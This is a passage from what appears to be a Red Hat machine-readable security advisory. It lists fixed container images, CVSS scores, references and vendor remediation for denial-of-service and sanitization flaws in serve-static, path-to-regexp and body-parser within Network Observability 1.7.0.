"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "serve-static: Improper Sanitization in serve-static", }, { cve: "CVE-2024-45296", cwe: { id: "CWE-1333", name: "Inefficient Regular Expression Complexity", }, discovery_date: "2024-09-09T19:20:18.127723+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2310908", }, ], notes: [ { category: "description", text: "A flaw was found in path-to-regexp package, where it turns path strings into regular expressions. In certain cases, path-to-regexp will output a regular expression that can be exploited to cause poor performance. Because JavaScript is single-threaded and regex matching runs on the main thread, poor performance will block the event loop and lead to a denial of service (DoS).", title: "Vulnerability description", }, { category: "summary", text: "path-to-regexp: Backtracking regular expressions cause ReDoS", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-45296", }, { category: "external", summary: "RHBZ#2310908", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310908", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-45296", url: "https://www.cve.org/CVERecord?id=CVE-2024-45296", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-45296", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-45296", }, { category: "external", summary: "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f", url: "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f", }, { category: "external", summary: "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6", url: "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6", }, { category: "external", summary: "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j", url: "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j", }, ], release_date: "2024-09-09T19:15:13.330000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-22T01:05:39+00:00", details: "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8014", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5.3, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", version: "3.1", }, products: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "path-to-regexp: Backtracking regular expressions cause ReDoS", }, { cve: "CVE-2024-45590", cwe: { id: "CWE-405", name: "Asymmetric Resource Consumption (Amplification)", }, discovery_date: "2024-09-10T16:20:29.292154+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311171", }, ], notes: [ { category: "description", text: "A flaw was found in body-parser. This vulnerability causes denial of service via a specially crafted payload when the URL encoding is enabled.", title: "Vulnerability description", }, { category: "summary", text: "body-parser: Denial of Service Vulnerability in body-parser", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", 